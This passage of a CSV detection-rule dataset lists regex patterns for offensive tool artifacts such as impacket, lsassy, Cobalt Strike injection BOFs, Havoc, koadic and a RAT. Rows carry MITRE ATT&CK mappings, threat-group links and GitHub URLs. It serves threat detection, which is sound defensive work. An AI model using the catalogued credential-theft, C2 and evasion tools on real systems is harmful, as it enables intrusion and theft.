T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8027" "*/imap-capabilities.nse*",".{0,1000}\/imap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8028" "*/imap-ntlm-info.nse*",".{0,1000}\/imap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8029" "*/IMDSpoof.git*",".{0,1000}\/IMDSpoof\.git.{0,1000}","offensive_tool_keyword","IMDSpoof","IMDSPOOF is a cyber deception tool that spoofs the AWS IMDS service to return HoneyTokens that can be alerted on.","T1584 - T1204 - T1078 - T1558","TA0007 - TA0001 - TA0002 - TA0004","N/A","N/A","Sniffing & Spoofing","https://github.com/grahamhelton/IMDSpoof","1","1","N/A","N/A","8","2","101","3","2023-11-24T23:42:48Z","2023-11-24T23:21:21Z","8030" "*/imfiver/CVE-2022-0847*",".{0,1000}\/imfiver\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","N/A","3","280","78","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z","8031" "*/Imminent Monitor 3.9.exe*",".{0,1000}\/Imminent\sMonitor\s3\.9\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","1","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","8032" "*/ImminentMonitor.exe*",".{0,1000}\/ImminentMonitor\.exe.{0,1000}","offensive_tool_keyword","Imminent-Monitor","used for malicious activities such as keylogging - screen capture and remote control of infected systems.","T1012 - T1059 - T1105 - T1071 - T1124 - T1041","TA0005 - 
TA0003 - TA0011 - TA0009","Imminent RAT","PROMETHIUM","Malware","https://github.com/Indestructible7/Imminent-Monitor-v3.9","1","1","N/A","N/A","8","1","4","2","2022-11-04T18:48:14Z","2022-11-04T18:15:20Z","8033" "*/impacket.*",".{0,1000}\/impacket\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8034" "*/impacket.git*",".{0,1000}\/impacket\.git.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8035" "*/impacket.zip*",".{0,1000}\/impacket\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8036" "*/impacket/*",".{0,1000}\/impacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8037" "*/impacketfile.py*",".{0,1000}\/impacketfile\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","8038" "*/Impersonate.exe*",".{0,1000}\/Impersonate\.exe.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","8039" "*/impersonate.git*",".{0,1000}\/impersonate\.git.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","8040" "*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral 
Movement","https://github.com/sensepost/impersonate","1","1","N/A","N/A","10","4","301","38","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z","8041" "*/impersonate.py*",".{0,1000}\/impersonate\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8042" "*/impersonate-rs*",".{0,1000}\/impersonate\-rs.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allowing you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","N/A","1","95","12","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z","8043" "*/imperun * *cmd.exe /c whoami*",".{0,1000}\/imperun\s.{0,1000}\s.{0,1000}cmd\.exe\s\/c\swhoami.{0,1000}","offensive_tool_keyword","Nightmangle","Nightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","8044" "*/Imperva_gzip_WAF_Bypass*",".{0,1000}\/Imperva_gzip_WAF_Bypass.{0,1000}","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. 
etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","network exploitation tool","N/A","2","157","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z","8045" "*/implant/callback*",".{0,1000}\/implant\/callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","8046" "*/implant/elevate/*",".{0,1000}\/implant\/elevate\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","8047" "*/implant/register_cmd*",".{0,1000}\/implant\/register_cmd.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","8048" "*/implants/*/Syscalls.*",".{0,1000}\/implants\/.{0,1000}\/Syscalls\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8049" "*/ImplantSSP.exe*",".{0,1000}\/ImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system 
start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","8050" "*/impress-remote-discover.nse*",".{0,1000}\/impress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8051" "*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","8052" "*/inceptor.git*",".{0,1000}\/inceptor\.git.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","8053" "*/include/KaynStrike.h*",".{0,1000}\/include\/KaynStrike\.h.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","8054" "*/infection_monkey/*",".{0,1000}\/infection_monkey\/.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","8055" "*/InflativeLoading.git*",".{0,1000}\/InflativeLoading\.git.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8056" "*/InflativeLoading.py*",".{0,1000}\/InflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8057" "*/InflativeLoading-main.zip*",".{0,1000}\/InflativeLoading\-main\.zip.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","8058" "*/Infoga*",".{0,1000}\/Infoga.{0,1000}","offensive_tool_keyword","Infoga","Email Information Gathering.","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - 
TA0004","N/A","N/A","Reconnaissance","https://github.com/m4ll0k/Infoga","1","0","#linux","N/A","N/A","1","93","9","2024-07-31T03:44:56Z","2024-06-22T08:52:37Z","8059" "*/informix-brute.nse*",".{0,1000}\/informix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8060" "*/informix-query.nse*",".{0,1000}\/informix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8061" "*/informix-tables.nse*",".{0,1000}\/informix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8062" "*/inject.cpp*",".{0,1000}\/inject\.cpp.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","8063" "*/Inject/Dll/LoadDll*",".{0,1000}\/Inject\/Dll\/LoadDll.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8064" "*/Inject/PE/*.cs*",".{0,1000}\/Inject\/PE\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8065" "*/Inject/ShellCode/*.cs*",".{0,1000}\/Inject\/ShellCode\/.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","8066" "*/injectAmsiBypass/*",".{0,1000}\/injectAmsiBypass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","N/A","10","10","378","69","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z","8067" "*/inject-assembly/*",".{0,1000}\/inject\-assembly\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - 
Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","N/A","10","10","494","74","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z","8068" "*/injectEtw.*",".{0,1000}\/injectEtw\..{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 
XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","N/A","10","10","279","55","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z","8069" "*/Injection/clipboard/*",".{0,1000}\/Injection\/clipboard\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 